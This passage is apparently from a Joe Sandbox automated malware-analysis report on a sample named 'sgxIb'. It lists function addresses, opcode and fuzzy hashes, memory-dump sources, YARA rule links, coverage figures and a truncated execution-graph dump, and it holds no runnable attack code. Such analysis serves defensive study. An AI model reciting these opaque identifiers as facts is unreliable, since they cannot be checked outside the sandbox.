                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3ccaae41a4d6cb09b08a5283a04597ed7d11b8ee4ac117f9d2417f1a8667019
                                        • Instruction ID: 8dd318711b5e95af9a31d02c36c9a085ece639183c42458b1083e8750f007446
                                        • Opcode Fuzzy Hash: f3ccaae41a4d6cb09b08a5283a04597ed7d11b8ee4ac117f9d2417f1a8667019
                                        • Instruction Fuzzy Hash: 0F217C75F002159FDB50DF6AE944AAEBBF9EB88750F108025E905EB340EB35DD41CB91
                                        Function 06F13FCF Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdc3c3c0a49fd462fc17a28ff8b3911d987e494c7daa11dfd2dcd2d7b3f24975
                                        • Instruction ID: 941afb2bf220fdf0932a0a7f0dc339c9cb0c39b891c7512e1ee78cd383a27329
                                        • Opcode Fuzzy Hash: fdc3c3c0a49fd462fc17a28ff8b3911d987e494c7daa11dfd2dcd2d7b3f24975
                                        • Instruction Fuzzy Hash: A2216D75F002159FDB50DF7AE944AAEBBF9EB88750F108025E905EB380EB35DD418BA1
                                        Function 06F1B038 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d6305c7743d4f32d257c8717251e66e3d6e120a255d7a9f13964d062f3e9674
                                        • Instruction ID: 1bf8bffaaaa21472c6f3339176642019de1ed37566b03618f7e2186b8996c080
                                        • Opcode Fuzzy Hash: 4d6305c7743d4f32d257c8717251e66e3d6e120a255d7a9f13964d062f3e9674
                                        • Instruction Fuzzy Hash: D0215E71D1075ACBDF65CFA9C84069EBBB5FF85350F10492AE809EF250E7719846CB81
                                        Function 06F16E2F Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4c608d4d16e17c46c3c88df4503744e7fa41f1be219646a24c8459886758c13
                                        • Instruction ID: 627940f2075fdad1004ec9208a280aa7430801b870b0491e90fdc7ea77c37631
                                        • Opcode Fuzzy Hash: a4c608d4d16e17c46c3c88df4503744e7fa41f1be219646a24c8459886758c13
                                        • Instruction Fuzzy Hash: FD21AF30F101099BDF94DB69E85469EBBB7EBC4390F148535E409EB340DB31ED828B85
                                        Function 06F005E0 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e04c8e5cfbe852c1bbc3ad949baae8745c3f7a409c7d2d0548b2a454190e7b2
                                        • Instruction ID: 7b03bfce858cb1e748122510b8c9c728189a55f7d3d5a1339b5e2077d555ffe0
                                        • Opcode Fuzzy Hash: 9e04c8e5cfbe852c1bbc3ad949baae8745c3f7a409c7d2d0548b2a454190e7b2
                                        • Instruction Fuzzy Hash: 982124B1D01218DFCB50DF99D884BDEFBF4EB49320F14806AE808AB251D3749A44CFA4
                                        Function 06F13570 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d87436c064333aeb20c92ef31be7902e4a1f6f41eb0bc277ebce7ba8f2829ad7
                                        • Instruction ID: 46aac7c8a586ebab60a574eae820f97a0f187bb3eda25224e361f7dc483d6ca7
                                        • Opcode Fuzzy Hash: d87436c064333aeb20c92ef31be7902e4a1f6f41eb0bc277ebce7ba8f2829ad7
                                        • Instruction Fuzzy Hash: 75110272E002185FCF64DB79C8405DEFBB6EF89750F1445AAD406EB240EA31DA42CBE1
                                        Function 06F140E0 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74e35dcd6898573bc2b990c8c5909344ab2ea1649c951a35e902eb9e1abe64e9
                                        • Instruction ID: bbd0b188466d6bd9443aada99f5ff8911a53f4118e3a441d7dfa9a1e693501d9
                                        • Opcode Fuzzy Hash: 74e35dcd6898573bc2b990c8c5909344ab2ea1649c951a35e902eb9e1abe64e9
                                        • Instruction Fuzzy Hash: 66118E32B041289FDB559668DC146AE73FBEBC8350B008439C50EEB340EE35DC028B91
                                        Function 06F13D99 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9adb3588d92273d2669da8d0da7a13d22b5c2ae8e7b9490bd8de85e535fff49a
                                        • Instruction ID: 4c6e6c8c65547a0885bc7adc3c135283b106eda7537f3781626eaca01b4cecb4
                                        • Opcode Fuzzy Hash: 9adb3588d92273d2669da8d0da7a13d22b5c2ae8e7b9490bd8de85e535fff49a
                                        • Instruction Fuzzy Hash: 652103B5D01219AFCB00DF9AD884ACEFFB8FB49320F10812AE518B7200C374A954CFA5
                                        Function 06F14318 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cfca82bdbd7e6da2dcd8de44d06b0a1493bdaad236cb2d3bbeac36ddb1ee997
                                        • Instruction ID: 43f0d4c750eab5e4e92a74529af7e1fbca1051f3d59887fb3b6b21bfc70f3dcd
                                        • Opcode Fuzzy Hash: 0cfca82bdbd7e6da2dcd8de44d06b0a1493bdaad236cb2d3bbeac36ddb1ee997
                                        • Instruction Fuzzy Hash: B901FD31F100111FDB6486AEA411B6FA3DBDBCA764F20883AE50ECB384D925DC0303A5
                                        Function 06F00550 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 997b20001844d46ce1f06689d94bea414614ac5fc011fc8c8d4a098ef0622b2f
                                        • Instruction ID: c083ad918d21f638d6f64556808144cdff63bb21eb71809d5aa340c1573f5449
                                        • Opcode Fuzzy Hash: 997b20001844d46ce1f06689d94bea414614ac5fc011fc8c8d4a098ef0622b2f
                                        • Instruction Fuzzy Hash: C31153B2800249DFDB10DF99C849BEEBFF5EB48320F148419E958A7250CB39A950DFA1
                                        Function 06F140D1 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f8221b8afef1d28eae48f7819d8a7f77a7161e222c7793bd5423fdf444a3d45
                                        • Instruction ID: c59c6eda00156c99774c1d805df37917552ad21a95254f25d3139cf239070527
                                        • Opcode Fuzzy Hash: 4f8221b8afef1d28eae48f7819d8a7f77a7161e222c7793bd5423fdf444a3d45
                                        • Instruction Fuzzy Hash: 0601D432B141145BDB999578DC146EF32EB9BC8350F004636D41EEB280EE248C0247D1
                                        Function 06F13DA0 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c19cc5882ed53ccd5b5f8c368f76680e40a7a213b7607dc5db2718d9afaad38
                                        • Instruction ID: d87ac9ff53b9f54050fd5605d31bbfde57f6394b394c2c209c935d6abf2115eb
                                        • Opcode Fuzzy Hash: 6c19cc5882ed53ccd5b5f8c368f76680e40a7a213b7607dc5db2718d9afaad38
                                        • Instruction Fuzzy Hash: 6011B0B5D01659AFCB00DF9AD884ADEFFB4FB49320F10812AE918B7240C374A954CFA5
                                        Function 06F14328 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f414a5e898a01b3c223406dc09046d6fa3117c456a0f4a370faddbe6cf55162a
                                        • Instruction ID: 30d9893f5927dfffacbf2b3eb24350c0210db7d6230a4c11f85ac0af03e733cc
                                        • Opcode Fuzzy Hash: f414a5e898a01b3c223406dc09046d6fa3117c456a0f4a370faddbe6cf55162a
                                        • Instruction Fuzzy Hash: 2F01DC30F100111FDB6496AEA411B2FA3DBDBCA764F20883AE50ECB394DA65DC0343A5
                                        Function 06F1F2C8 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07ddd757ec7115707329ab226aee633b6fd2860c6a4f3b4b102f8294436cc95e
                                        • Instruction ID: 88fffa3ec188d8a52a5c19093263971ab54f63d41f61356fae36ddd99b1f3448
                                        • Opcode Fuzzy Hash: 07ddd757ec7115707329ab226aee633b6fd2860c6a4f3b4b102f8294436cc95e
                                        • Instruction Fuzzy Hash: 9001FF30F100101BCB65DABDE45072FA7DADBC9624F108839E40ECB340EE21DC034396
                                        Function 06F1A422 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 523caac14452cab331e7a326a87213baaf2c4a3471a1d6ba81ec46299940d323
                                        • Instruction ID: 4dd0adbf572671eb6fe921ae43bd707feac2b08108a7e597d80620b4709df9d7
                                        • Opcode Fuzzy Hash: 523caac14452cab331e7a326a87213baaf2c4a3471a1d6ba81ec46299940d323
                                        • Instruction Fuzzy Hash: 7401AD30B01115AFDB60DA7DF858B6AB3DAFB89664F108439E10ECB360EE25DC4287C1
                                        Function 06F1A430 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b297546c1097d5db1ecdc219bab7fd30a9983fbb3659037bc0b9875ead32e44c
                                        • Instruction ID: a2936a699cc6ce17ada55cb2b683756d8a89c586278e5b98aaaf81489417f9e4
                                        • Opcode Fuzzy Hash: b297546c1097d5db1ecdc219bab7fd30a9983fbb3659037bc0b9875ead32e44c
                                        • Instruction Fuzzy Hash: C6018130B011159FDB64D67DE45475AB3DAFB89664F108439E10ECB360DE25DC428785
                                        Function 06F1A427 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14e6b809a7b8ded83b57c96d48e656a1d7a3b4f4e5791a44e7c5f92db4c9d0ce
                                        • Instruction ID: 56f279c0697680112e1825079042cb7d27a440066097ad33be322b7234ded2d7
                                        • Opcode Fuzzy Hash: 14e6b809a7b8ded83b57c96d48e656a1d7a3b4f4e5791a44e7c5f92db4c9d0ce
                                        • Instruction Fuzzy Hash: A5018B30B011119FDB60DA7DA45875AA7DAEB89224F108939E11ADB3A0DE25DC428781
                                        Function 06F1C8FF Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 447b3dfe8b42fdf320acae92c20a1f9f7bdb58545efc90dab0772c641556dbaa
                                        • Instruction ID: ab41ca399c7ac3ae43d00094a8ee85fea05fbc82c571a3d82556f6ffac1868bd
                                        • Opcode Fuzzy Hash: 447b3dfe8b42fdf320acae92c20a1f9f7bdb58545efc90dab0772c641556dbaa
                                        • Instruction Fuzzy Hash: 4A012631F102249BCF54DA79EC5069EBB76FB80364F000639E811EF284DA2A9C45CBC0
                                        Function 06F0026D Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a69cd213fa437f3c41eaeb433d4c19043e8e046b3b118200fbf7cb2b171bfda
                                        • Instruction ID: 91c36297b6dd32d16df598065487d2718bf15154ea3aecf52d8f74d3d7319ba1
                                        • Opcode Fuzzy Hash: 2a69cd213fa437f3c41eaeb433d4c19043e8e046b3b118200fbf7cb2b171bfda
                                        • Instruction Fuzzy Hash: 69F08135B011199FDB00DBA9D840BDE77F1FB88322F148561E519A72D4C634D8118BA0
                                        Function 06F00B28 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddf11dfc0567400d437dfc0d7414ad6981a7c2878eb801fcf92f05d96db9122e
                                        • Instruction ID: 6e5a2ce2787324cc9ed1fbad469fd54a03cb1766251b78410841f1a91ef63432
                                        • Opcode Fuzzy Hash: ddf11dfc0567400d437dfc0d7414ad6981a7c2878eb801fcf92f05d96db9122e
                                        • Instruction Fuzzy Hash: 8AF082363002197F9F45AE999C159AF7FABFBC8360B004429FA0DD7290DB31892197A5
                                        Function 06F16588 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b888c06bc6d8e82615bb55d8557f5cc33668630eea32e24c6d0ed471c2f6d66
                                        • Instruction ID: b0f09d1c482ad59e5f2a634b0403a41f0856f37fe531e181e903d6f74791cc0d
                                        • Opcode Fuzzy Hash: 8b888c06bc6d8e82615bb55d8557f5cc33668630eea32e24c6d0ed471c2f6d66
                                        • Instruction Fuzzy Hash: 8BE092B1D15248AFDF60CA78CD0579A7BA99B06244F1144A6D804DF24BE175CE018792
                                        Function 06F00348 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2898320219df3c1182aeab215189d6953e411df2ecbb36bedb785bddfd084a6
                                        • Instruction ID: a2d5d3c3dae2bf7aca79ee5b26bec24cd8b52dae81cb27dd12cdd81e7cede26b
                                        • Opcode Fuzzy Hash: c2898320219df3c1182aeab215189d6953e411df2ecbb36bedb785bddfd084a6
                                        • Instruction Fuzzy Hash: 35E04FB2E003199FAB90DFBA9D016AE7BF9EB49650F108475D909E3240FA71C6009BD1
                                        Function 06F02A2B Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc7a68a8a01b5c4d92d246bc8f27fdf0baac86b9df0d82260f1bc68d40d7dbd7
                                        • Instruction ID: 3bb5e544bdeb5aa912f7b27a53ea625a3ba3c72caf90c28af91170be52c08128
                                        • Opcode Fuzzy Hash: dc7a68a8a01b5c4d92d246bc8f27fdf0baac86b9df0d82260f1bc68d40d7dbd7
                                        • Instruction Fuzzy Hash: B0E0C23AF102319F2EA0E66964A41ADB781E7C816432041A6CA19CB244DE268E0347D1

                                        Non-executed Functions

                                        Function 06F177B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2222239885
                                        • Opcode ID: 53cce3fef84aa084743ebe8d93106039c171635186f682b70500afc9e668f873
                                        • Instruction ID: 10da2f8d95051102de76db03fcf973bb873d3e5e84957494bdf82674e08e4a48
                                        • Opcode Fuzzy Hash: 53cce3fef84aa084743ebe8d93106039c171635186f682b70500afc9e668f873
                                        • Instruction Fuzzy Hash: E2120D30E002198FDB68EF69D954A9EB7F6BF88344F2085A9D409AF354DB319D85CB81
                                        Function 06F1AA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: 593036de47e32530b2ef7c0682ffbf0eaf4807d18051bc620674a685ba970263
                                        • Instruction ID: c2c5dcfb4a83050df027d805ce0c5f847905a723390ea336003fcd693b396ba8
                                        • Opcode Fuzzy Hash: 593036de47e32530b2ef7c0682ffbf0eaf4807d18051bc620674a685ba970263
                                        • Instruction Fuzzy Hash: EA913C30E02309DFEB68DB69D558BAEBBB2EF84341F108529D8019F294DB759D85CB90
                                        Function 06F171B8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-390881366
                                        • Opcode ID: 2f12a5b46d16c386cb8c2fad4e092a1d7841e9e6b0a51fb0fd6376eb47006986
                                        • Instruction ID: e9b9f65f5525ff676888482007f298407c6036771c473921c89533f254779a41
                                        • Opcode Fuzzy Hash: 2f12a5b46d16c386cb8c2fad4e092a1d7841e9e6b0a51fb0fd6376eb47006986
                                        • Instruction Fuzzy Hash: 63F14A34B01309CFDB58EB69D594A6EBBB6FF84340F208569D4099F368CB359C86CB81
                                        Function 06F1BB30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: d9bf76219fcdb0789fcc030480097fc60d95caf9a39d8ddfa5ae88759e8375b7
                                        • Instruction ID: 632d7176c2d3b8c68b7fb63b0aba0b21ba3c51cd1ae26b626c72352aeeaa0648
                                        • Opcode Fuzzy Hash: d9bf76219fcdb0789fcc030480097fc60d95caf9a39d8ddfa5ae88759e8375b7
                                        • Instruction Fuzzy Hash: 5A716A31E0020ACFDBA8DFA9D5546AEB7F2FF84350B108969D40ADF294DB719D46CB81
                                        Function 06F184F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 31bc43511d43985c457d13a9f2e64b7b58b4b28bdf77d79f7bf7bebb36a0a08d
                                        • Instruction ID: a379a67725928edc5e3de10043c467ad6c272fe28c2c653ac34a96be490d3190
                                        • Opcode Fuzzy Hash: 31bc43511d43985c457d13a9f2e64b7b58b4b28bdf77d79f7bf7bebb36a0a08d
                                        • Instruction Fuzzy Hash: D2B12730F012198FDB54EB69D69469EBBB2FF84390F248929D4169F394DB35DC86CB80
                                        Function 06F18908 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q$LR^q$$^q$$^q
                                        • API String ID: 0-2454687669
                                        • Opcode ID: 03a4274c2ee41426b55c9bd86a94b44c8a9774bc253ddccc540daf0fcbbd9c7b
                                        • Instruction ID: 94977e64d6976a39996750d83f83b0d3332d7c5992a72ca115ae3977c1845a1d
                                        • Opcode Fuzzy Hash: 03a4274c2ee41426b55c9bd86a94b44c8a9774bc253ddccc540daf0fcbbd9c7b
                                        • Instruction Fuzzy Hash: 0151E530B002029FDB54DB28DA94A6E77E6FF88780F148569D415DF3A9DB35EC41CB91
                                        Function 06F1ADD8 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: bac9412e43d400d3db169d08810434f34a708ec975d9cb4c7838e730eba55194
                                        • Instruction ID: 3f9fff95929da9b5a66f5902d6daaad2b5fe92b15a6a9fabf67e0bc78b97716f
                                        • Opcode Fuzzy Hash: bac9412e43d400d3db169d08810434f34a708ec975d9cb4c7838e730eba55194
                                        • Instruction Fuzzy Hash: 4851BD34F12304DFCBA5DA68E5806AEB7B2EB88390F10852AD415DF354DB31DC86CB90

                                        Execution Graph

                                        Execution Coverage:11.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:291
                                        Total number of Limit Nodes:16
                                        execution_graph 28888 7271a86 28889 7271a67 28888->28889 28890 7271a8c 28888->28890 28895 7273bc6 28890->28895 28912 7273b50 28890->28912 28928 7273b60 28890->28928 28891 7271bff 28896 7273b54 28895->28896 28898 7273bc9 28895->28898 28897 7273b82 28896->28897 28944 72745c7 28896->28944 28948 72742dd 28896->28948 28953 7273fbf 28896->28953 28960 7274270 28896->28960 28966 72740d2 28896->28966 28970 7274012 28896->28970 28975 7274073 28896->28975 28980 7274196 28896->28980 28988 7274488 28896->28988 28996 727420a 28896->28996 29003 7274741 28896->29003 29008 72743a4 28896->29008 29014 7274286 28896->29014 28897->28891 28898->28891 28913 7273b54 28912->28913 28914 7273b82 28913->28914 28915 72745c7 2 API calls 28913->28915 28916 7274286 2 API calls 28913->28916 28917 72743a4 2 API calls 28913->28917 28918 7274741 2 API calls 28913->28918 28919 727420a 4 API calls 28913->28919 28920 7274488 4 API calls 28913->28920 28921 7274196 4 API calls 28913->28921 28922 7274073 2 API calls 28913->28922 28923 7274012 2 API calls 28913->28923 28924 72740d2 2 API calls 28913->28924 28925 7274270 2 API calls 28913->28925 28926 7273fbf 4 API calls 28913->28926 28927 72742dd 2 API calls 28913->28927 28914->28891 28915->28914 28916->28914 28917->28914 28918->28914 28919->28914 28920->28914 28921->28914 28922->28914 28923->28914 28924->28914 28925->28914 28926->28914 28927->28914 28929 7273b7a 28928->28929 28930 72745c7 2 API calls 28929->28930 28931 7274286 2 API calls 28929->28931 28932 7273b82 28929->28932 28933 72743a4 2 API calls 28929->28933 28934 7274741 2 API calls 28929->28934 28935 727420a 4 API calls 28929->28935 28936 7274488 4 API calls 28929->28936 28937 7274196 4 API calls 28929->28937 28938 7274073 2 API calls 28929->28938 28939 7274012 2 API calls 28929->28939 28940 72740d2 2 API calls 28929->28940 28941 7274270 2 API calls 28929->28941 28942 7273fbf 4 API calls 28929->28942 28943 72742dd 2 API calls 28929->28943 28930->28932 28931->28932 28932->28891 28933->28932 28934->28932 28935->28932 28936->28932 28937->28932 28938->28932 28939->28932 28940->28932 28941->28932 28942->28932 28943->28932 29019 72712a7 28944->29019 29023 72712a8 28944->29023 28945 72745e5 28949 7274300 28948->28949 29027 7271361 28949->29027 29031 7271368 28949->29031 28950 7274564 28950->28897 29035 